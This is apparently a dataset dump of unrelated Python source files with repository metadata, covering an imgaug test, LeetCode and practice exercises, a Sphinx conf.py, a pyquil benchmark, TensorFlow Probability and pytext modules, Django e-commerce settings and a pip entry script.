        image = np.zeros((1, 1, 3), dtype=np.uint8)
        points = np.linspace(0.0+0.9, 1000.0-0.9, num=1)
        points = np.stack([points, points], axis=-1)
        other = _FixedPointsSampler(points)
        sampler = iaa.SubsamplingPointsSampler(other, 100)
        _ = sampler.sample_points([image], 1)[0]
        rs_s1_1 = other.last_random_state
        _ = sampler.sample_points([image], 1)[0]
        rs_s1_2 = other.last_random_state
        _ = sampler.sample_points([image], 2)[0]
        rs_s2_1 = other.last_random_state
        # same seed -> same derived random state for the wrapped sampler
        assert rs_s1_1.equals(rs_s1_2)
        assert not rs_s1_1.equals(rs_s2_1)
    def test_conversion_to_string(self):
        sampler = iaa.SubsamplingPointsSampler(
            iaa.RegularGridPointsSampler(10, 20),
            10
        )
        expected = (
            "SubsamplingPointsSampler("
            "RegularGridPointsSampler("
            "Deterministic(int 10), "
            "Deterministic(int 20)"
            "), "
            "10"
            ")"
        )
        assert sampler.__str__() == sampler.__repr__() == expected
| [
"kontakt@ajung.name"
] | kontakt@ajung.name |
4ed63a194e46e6ec0133622fac16fb04d230513d | 0b8eefbd29abda41cbe3725621a208c90aa9b6f0 | /Problemset/relative-sort-array/relative-sort-array.py | 01d5a054220ddad076f0d6e990023dee45ace2e1 | [
"MIT"
] | permissive | KivenCkl/LeetCode | bf2d86c6d0a4a3cd136ed3ce74b3561ca26f510d | fcc97c66f8154a5d20c2aca86120cb37b9d2d83d | refs/heads/master | 2021-07-07T12:57:28.252071 | 2020-09-13T05:19:13 | 2020-09-13T05:19:13 | 185,034,499 | 8 | 7 | null | null | null | null | UTF-8 | Python | false | false | 620 | py |
# @Title: 数组的相对排序 (Relative Sort Array)
# @Author: KivenC
# @Date: 2019-07-18 14:56:57
# @Runtime: 48 ms
# @Memory: 13.1 MB
class Solution:
    def relativeSortArray(self, arr1: List[int], arr2: List[int]) -> List[int]:
        """Sort arr1 so its elements follow the relative order given by
        arr2; elements absent from arr2 are appended in ascending order.
        """
        from collections import Counter
        remaining = Counter(arr1)
        ordered = []
        # emit arr2's values first, keeping their multiplicity from arr1
        for value in arr2:
            ordered.extend([value] * remaining.pop(value, 0))
        # whatever was not mentioned in arr2 goes last, sorted ascending
        for value in sorted(remaining):
            ordered.extend([value] * remaining[value])
        return ordered
| [
"chen941229@126.com"
] | chen941229@126.com |
4c2040871eb316dfbdd91a29953777fda947cfbb | 360e1f69f4c0923c5d79bc82aa33c0fd4e80b71e | /RECURSION/Reverse_a_string_recurssion.py | 53056e1653e7608aa8159a683d5cf2066771dbbd | [] | no_license | Vijay1234-coder/data_structure_plmsolving | 04e52fe6c918313e13d39107a2ded8b47645bb12 | d449b266295d1ae55613cdcfd9b22ad9cee3dfbe | refs/heads/master | 2023-08-01T00:55:28.825972 | 2021-09-12T15:20:12 | 2021-09-12T15:20:12 | 387,782,783 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py |
def reverse(s):
if len(s)<= 1:
return s
else:
return reverse(s[1:])+s[0] # 'bc'+'a'
#'c'+'b'+'a'
print(reverse('abc'))
| [
"77201164+Vijay1234-coder@users.noreply.github.com"
] | 77201164+Vijay1234-coder@users.noreply.github.com |
2e6eacc165e2ade818208ef44b1eac4d38c1a04b | a9a90eae727590f0ccffaa255ffeaa194309fbe9 | /Codekata/oddadd.py | f24be72dff28c32c3555a9d6cff21e247eba6288 | [] | no_license | dhanuskarthikeyan/guvi | 18c39674d3ee8e0012caef781d7905e541792174 | 671d64189f6039ffad8d91cab13942aafa87bf29 | refs/heads/master | 2020-06-03T00:07:45.041170 | 2019-07-08T17:39:33 | 2019-07-08T17:39:33 | 191,355,054 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | num,n=(raw_input().split())
num=int(num)
n=int(n)
num=n+num
if(num>=0):
if(num%2==0):
print "even"
else:
print "odd"
else:
print "invalid"
| [
"noreply@github.com"
] | dhanuskarthikeyan.noreply@github.com |
2dd8b2032365c69324b199b0db23e8c64b7655c0 | 603589525a5fc10fd30ae13181c5a730269705a5 | /doc/conf.py | 81222948adae5eaf8a1aa9e5f2776442adc6d70c | [
"MIT"
] | permissive | ibell/pdsim | 0848ac8d2819a67f0dd8acd86b269ff9a6130018 | 2e33166fdbb3b868a196607c3d06de54e429824d | refs/heads/master | 2023-08-31T01:49:44.386884 | 2023-08-29T00:40:21 | 2023-08-29T00:40:28 | 12,456,094 | 36 | 25 | MIT | 2023-08-20T19:24:03 | 2013-08-29T09:09:58 | Python | UTF-8 | Python | false | false | 12,156 | py | # -*- coding: utf-8 -*-
#
# PDModel documentation build configuration file, created by
# sphinx-quickstart on Wed May 02 18:01:14 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os, subprocess
on_rtd = os.getenv('READTHEDOCS') == 'True'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('sphinxext'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
#sys.path.insert(0,os.path.abspath('..'))
sys.path.append(os.path.abspath('..'))
sys.path.append(os.path.abspath(os.path.join('..','GUI')))
def run_prebuild(_):
# Run sphinx.apidoc programmatically to autogenerate documentation for PDSim
cur_dir = os.path.abspath(os.path.dirname(__file__))
subprocess.check_output(f'sphinx-apidoc -f -o PDSim_apidoc {os.path.dirname(PDSim.__file__)}', shell=True, cwd=cur_dir)
# -- Execute all notebooks --------------------------------------------------
if on_rtd:
for path, dirs, files in os.walk('.'):
for file in files:
if file.endswith('.ipynb') and '.ipynb_checkpoints' not in path:
subprocess.check_output(f'jupyter nbconvert --to notebook --output {file} --execute {file}', shell=True, cwd=path)
def setup(app):
app.connect('builder-inited', run_prebuild)
extensions = ['nbsphinx',
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.intersphinx',
#~ 'sphinx.ext.coverage',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.mathjax',
'matplotlib.sphinxext.plot_directive',
'IPython.sphinxext.ipython_console_highlighting',
'IPython.sphinxext.ipython_directive'
]
#autodoc_default_flags = ['members','no-inherited-members','show-inheritance','private-members']
intersphinx_mapping = {'CoolProp': ('http://coolprop.sourceforge.net', None),
'matplotlib':('https://matplotlib.org', None),
'wx': ('http://wxpython.org/Phoenix/docs/html/', None),
'python': ('https://docs.python.org/3/',None),
'numpy':('https://docs.scipy.org/doc/numpy',None)
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'PDSim'
copyright = u'2012, Ian Bell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
import PDSim
# The short X.Y version.
version = PDSim.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if on_rtd:
html_theme = 'default'
else:
html_theme = 'nature'
import sphinx_bootstrap_theme
# Activate the theme.
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
# Theme options are theme-specific and customize the look and feel of a
# theme further.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "PDSim",
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Site",
# A list of tuples containing pages or urls to link to.
# Valid tuples should be in the following forms:
# (name, page) # a link to a page
# (name, "/aa/bb", 1) # a link to an arbitrary relative url
# (name, "http://example.com", True) # arbitrary absolute url
# Note the "1" or "True" value above as the third argument to indicate
# an arbitrary url.
'navbar_links': [
("API", "PDSim_apidoc/PDSim"),
#("Link", "http://example.com", True),
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': True,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': True,
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 2,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar navbar-inverse",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "nav",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing with "" (default) or the name of a valid theme
# such as "amelia" or "cosmo".
'bootswatch_theme': "yeti",
# Choose Bootstrap version.
# Values: "3" (default) or "2" (in quotes)
'bootstrap_version': "3",
}
#~ import sphinx_rtd_theme
#~ html_theme = "sphinx_rtd_theme"
#~ html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
#~ sys.path.append(os.path.abspath('_themes'))
#~ html_theme_path = ['_themes']
#~ html_theme = 'kr'
#~ import sphinx_readable_theme
#~ html_theme_path = [sphinx_readable_theme.get_html_theme_path()]
#~ html_theme = 'readable'
#~ # import Cloud
#~ import cloud_sptheme as csp
#~ # set the html theme
#~ html_theme = "cloud" # NOTE: there is also a red-colored version named "redcloud"
#~ # set the theme path to point to cloud's theme data
#~ html_theme_path = [csp.get_theme_dir()]
#~ # [optional] set some of the options listed above...
#~ html_theme_options = { "roottarget": "index" }
#html_theme = 'Cloud'
#html_theme_path = ['../externals/scipy-sphinx-theme/_theme']
# html_theme_options = {
# "edit_link": "true",
# "sidebar": "right",
# "scipy_org_logo": "false",
# "rootlinks": [("http://scipy.org/", "Scipy.org"),
# ("http://docs.scipy.org/", "Docs")]
# }
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'PDSimdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'PDSim.tex', u'PDModel Documentation',
u'Ian Bell', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pdsim', u'PDSim Documentation',
[u'Ian Bell'], 1)
]
| [
"ian.h.bell@gmail.com"
] | ian.h.bell@gmail.com |
fa07553477e3bb2ecbeb87bd1383a2194282579c | b8eb666c8b6fe4610d87bff8048f4a95a1c5b549 | /测试/UI自动化/测试工具__Selenium/selenium/Phy/元组学习.py | 659d98f549399863fa07b324050146c658ed72dc | [] | no_license | cainiaosun/study | 1e983e404005e537410b205634a27cee974faba0 | 91df9b63cda1839b7fc60de3b5f1eb19ccc33a1f | refs/heads/master | 2020-05-30T09:59:19.749099 | 2019-11-22T10:39:12 | 2019-11-22T10:39:12 | 189,641,828 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,244 | py | #coding=UTF-8
import random
import random
list=[]
s=0
for i in range(1,5):
for j in range(1,5):
for k in range(1,5):
if i!=j and j<>k:
list.append(str(i)+str(j)+str(k))
s=s+1
print len(list)
print s
if len(list)==s:
print "是相等的!"
else:
print "不相等!"
print list[random.randrange(1,len(list))]
import math
for n in range(1,1):
i=math.sqrt(n+100)
print i
j=math.sqrt(n+268)
print j
if i/2.0==int(i/2) and j/2.0==int(j/2):
print n
break
import time
#print help(time.strftime)
print time.strftime("%Y")
list=[90,19,8,99,87,45,109]
list.sort()
print u"sort排序输出:",list
list=[90,19,8,99,87,45,109]
i=len(list)
for b in range(1,i):
i=i-1
for a in range(0,i):
if list[a+1]<list[a]:
temp=list[a+1]
list[a+1]=list[a]
list[a]=temp
print u"冒泡排序输出:",list
print '*'*10
for i in range(5):
print "* *"
print '*'*10
import sys
#sys.stdout.write(chr(1))
temp=0#正常产仔的兔子
temp1=0#剩余一个月产仔的兔子
temp2=1#剩余2个月产仔的兔子
m=12#int(raw_input(u"请输入月份:"))
for i in range(1,m+1):
temp=temp+temp1
temp22=temp2
temp2=temp
temp1=temp22
print "24个月后的兔子数量:",temp+temp1+temp2
f1=1
f2=1
for i in range(1,24):
#print "%12d%12d"%(f1,f1)
if (i%2)==0:
print ''
f1=f1+f2
f2=f1+f2
for i in range(1,10):
for j in range(0,10):
for k in range(0,10):
if i**3+j**3+k**3==int(str(i)+str(j)+str(k)):
print int(str(i)+str(j)+str(k))
import sys
from sys import stdout
n=45
print '数值:n=%d'%n
list=[]
for i in range(2,n+1):
while n!=0:
if n%i==0:
list.append(str(i))
sys.stdout.write(str(i))
sys.stdout.write("*")
n=n/i
else:
break
print "%d"%n
for i in range(0,len(list)):
if i<len(list)-1:
sys.stdout.write(list[i]+"*")
else:
sys.stdout.write(list[i])
h=100
sum=0
for i in range(1,11):
if i==1:
print ''
sum=sum+h
h=h/2.0
sum=sum+2*h
print h
print sum
| [
"1551577567@qq.com"
] | 1551577567@qq.com |
ba376912f0e12d134b662c53c1aadd34496d5a74 | 3a9f63f506172ac2d4a1ca9744fedd8f9b2b1628 | /pytext/data/__init__.py | 0ea8bef648e40c61f8aa137845996fdabce86390 | [
"BSD-3-Clause"
] | permissive | czHP0616/pytext | 4c40a8f3afa48284e2919e54d1b489830a321eed | 64ab1835905dea2e7797e6bc11398c55941fa728 | refs/heads/master | 2020-05-25T09:21:52.394044 | 2019-05-20T21:36:39 | 2019-05-20T21:39:33 | 187,734,243 | 0 | 0 | NOASSERTION | 2019-05-21T00:46:06 | 2019-05-21T00:46:06 | null | UTF-8 | Python | false | false | 1,807 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .batch_sampler import (
BaseBatchSampler,
EvalBatchSampler,
RandomizedBatchSampler,
RoundRobinBatchSampler,
)
from .bptt_lm_data_handler import BPTTLanguageModelDataHandler
from .compositional_data_handler import CompositionalDataHandler
from .contextual_intent_slot_data_handler import ContextualIntentSlotModelDataHandler
from .data import Batcher, Data, PoolingBatcher, generator_iterator
from .data_handler import BatchIterator, CommonMetadata, DataHandler
from .disjoint_multitask_data import DisjointMultitaskData
from .disjoint_multitask_data_handler import DisjointMultitaskDataHandler
from .doc_classification_data_handler import DocClassificationDataHandler, RawData
from .joint_data_handler import JointModelDataHandler
from .language_model_data_handler import LanguageModelDataHandler
from .pair_classification_data_handler import PairClassificationDataHandler
from .query_document_pairwise_ranking_data_handler import (
QueryDocumentPairwiseRankingDataHandler,
)
from .seq_data_handler import SeqModelDataHandler
__all__ = [
"Batcher",
"BaseBatchSampler",
"BatchIterator",
"BPTTLanguageModelDataHandler",
"CommonMetadata",
"CompositionalDataHandler",
"ContextualIntentSlotModelDataHandler",
"Data",
"DataHandler",
"DisjointMultitaskData",
"DisjointMultitaskDataHandler",
"DocClassificationDataHandler",
"EvalBatchSampler",
"generator_iterator",
"JointModelDataHandler",
"LanguageModelDataHandler",
"PairClassificationDataHandler",
"PoolingBatcher",
"RandomizedBatchSampler",
"QueryDocumentPairwiseRankingDataHandler",
"RawData",
"RoundRobinBatchSampler",
"SeqModelDataHandler",
]
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
b9a66d204ad06b3325735e7e16ef709e831b14d2 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R4/benchmark/startPyquil57.py | 4d55af20dcfac3d89ea1bfc7d95f538b60cedb64 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | # qubit number=4
# total number=10
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=5
prog += SWAP(1,0) # number=6
prog += SWAP(1,0) # number=7
prog += SWAP(2,0) # number=8
prog += SWAP(2,0) # number=9
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil57.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
65d874a8d7d0ba1e2d8d09e04d255d0fb375f38d | a84e1a1aac96612b32ba5adcc49a4005c0c5129e | /tensorflow_probability/python/internal/backend/numpy/raw_ops.py | 79f2e95696806a3b0f7425925a0bac61afb756f4 | [
"Apache-2.0"
] | permissive | jedisom/probability | 4fc31473d691d242a3e88c179ae3a9c555a29bb6 | 6791e7ce1c2b0a9057a19a8ea697aeaf796d4da7 | refs/heads/master | 2022-04-23T00:21:46.097126 | 2020-04-22T20:03:04 | 2020-04-22T20:04:59 | 258,031,151 | 1 | 0 | Apache-2.0 | 2020-04-22T22:08:57 | 2020-04-22T22:08:56 | null | UTF-8 | Python | false | false | 1,831 | py | # Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy implementations of TensorFlow general top-level functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import _utils as utils
__all__ = [
'MatrixDiagPartV2',
]
JAX_MODE = False
def _matrix_diag_part_v2(input, k, padding_value, name=None): # pylint: disable=redefined-builtin,unused-argument
"""Implements tf.raw_ops.MatrixDiagPartV2, for scalar k."""
if np.array(k).ndim > 0:
raise NotImplementedError
shp = np.shape(input)
if JAX_MODE:
if len(shp) > 2:
from jax import vmap # pylint: disable=g-import-not-at-top
return vmap(_matrix_diag_part_v2, (0, None, None))(
input, k, padding_value)
return np.diag(input, k=k)
input = np.reshape(input, (-1, shp[-2], shp[-1]))
output = np.array([np.diag(arr, k=k) for arr in input])
return output.reshape(*(shp[:-2] + output.shape[1:]))
MatrixDiagPartV2 = utils.copy_docstring( # pylint: disable=invalid-name
'tf.raw_ops.MatrixDiagPartV2',
_matrix_diag_part_v2)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
f541408a9b1aac2d3114dd958181e6ed89be2153 | c08e62724137acebcae7f7badf0176f7f73e64fd | /ecommerce/settings.py | f271e9e79c06df710e99651742f27a7a4a20ed0d | [] | no_license | keefm6776/ij-artefact-sales-site | 91809b8d3c975ea7b681acae62382b2146348611 | 826db92776c77b57a3f6da7727ba5fe9471e6662 | refs/heads/master | 2022-12-08T10:43:06.847267 | 2020-01-13T14:52:26 | 2020-01-13T14:52:26 | 216,651,747 | 0 | 1 | null | 2022-11-22T04:46:49 | 2019-10-21T19:43:42 | Python | UTF-8 | Python | false | false | 4,793 | py | """
Django settings for ecommerce project.
Generated by 'django-admin startproject' using Django 1.11.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
#import env
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['localhost', 'ijones-artefact-sales.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_forms_bootstrap',
'accounts',
'artefacts',
'cart',
'checkout',
'customer',
'storages',
'bids',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ecommerce.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
'cart.contexts.cart_contents',
],
},
},
]
WSGI_APPLICATION = 'ecommerce.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/databases
if "DATABASE_URL" in os.environ:
DATABASES = {'default': dj_database_url.parse(
os.environ.get('DATABASE_URL'))}
else:
print("Database URL not found. Using SQLite instead")
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.\
UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.\
MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.\
CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.\
NumericPasswordValidator',
},
]
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend',
'accounts.backends.CaseInsensitiveAuth']
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
AWS_S3_OBJECT_PARAMETERS = {
'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',
'CacheControl': 'max-age=94608000'
}
AWS_STORAGE_BUCKET_NAME = 'ij-artefact-sales'
AWS_S3_REGION_NAME = 'eu-west-1'
AWS_ACCESS_KEY_ID = os.environ.get("AWS_SECRET_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_DEFAULT_ACL = None
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'custom_storages.StaticStorage'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIAFILES_LOCATION = 'media'
DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
STRIPE_PUBLISHABLE = os.getenv('STRIPE_PUBLISHABLE')
STRIPE_SECRET = os.getenv('STRIPE_SECRET')
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
| [
"keefm_6776@yahoo.com"
] | keefm_6776@yahoo.com |
a881a9f8556f037ba6ea2123e9d8a596a0424231 | 37fdc797f0060a67c1e9318032bc7102d4fd9ecd | /untitled1/bin/pip3.7 | e52f46ac29013334a05a69eac759cb1d6ef18574 | [] | no_license | Change0224/PycharmProjects | 8fa3d23b399c5fb55661a79ca059f3da79847feb | 818ba4fd5dd8bcdaacae490ed106ffda868b6ca4 | refs/heads/master | 2021-02-06T15:37:16.653849 | 2020-03-03T14:30:44 | 2020-03-03T14:30:44 | 243,927,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | 7 | #!/Users/zhaojian/PycharmProjects/untitled1/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')()
)
| [
"lijj0224@163.com"
] | lijj0224@163.com |
c70840fd44de0cdfd339bb41f4681c5fb0b35748 | c4a119311ac01bbe7d5ab81b1d3d663ad0900ab6 | /python3-alpha/python-libs/atom/service.py | 246dd1b93419b5e808a842062b8b9a3ce615f379 | [
"Apache-2.0"
] | permissive | kuri65536/python-for-android | 1d8d99e81e64bc87805c2c58ee0dcf43d413e72e | 26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891 | refs/heads/master | 2021-06-02T01:17:29.685199 | 2018-05-05T00:12:13 | 2018-05-05T01:36:22 | 32,235,625 | 280 | 122 | Apache-2.0 | 2020-05-15T06:47:36 | 2015-03-14T22:44:36 | Python | UTF-8 | Python | false | false | 28,950 | py | #!/usr/bin/python
#
# Copyright (C) 2006, 2007, 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""AtomService provides CRUD ops. in line with the Atom Publishing Protocol.
AtomService: Encapsulates the ability to perform insert, update and delete
operations with the Atom Publishing Protocol on which GData is
based. An instance can perform query, insertion, deletion, and
update.
HttpRequest: Function that performs a GET, POST, PUT, or DELETE HTTP request
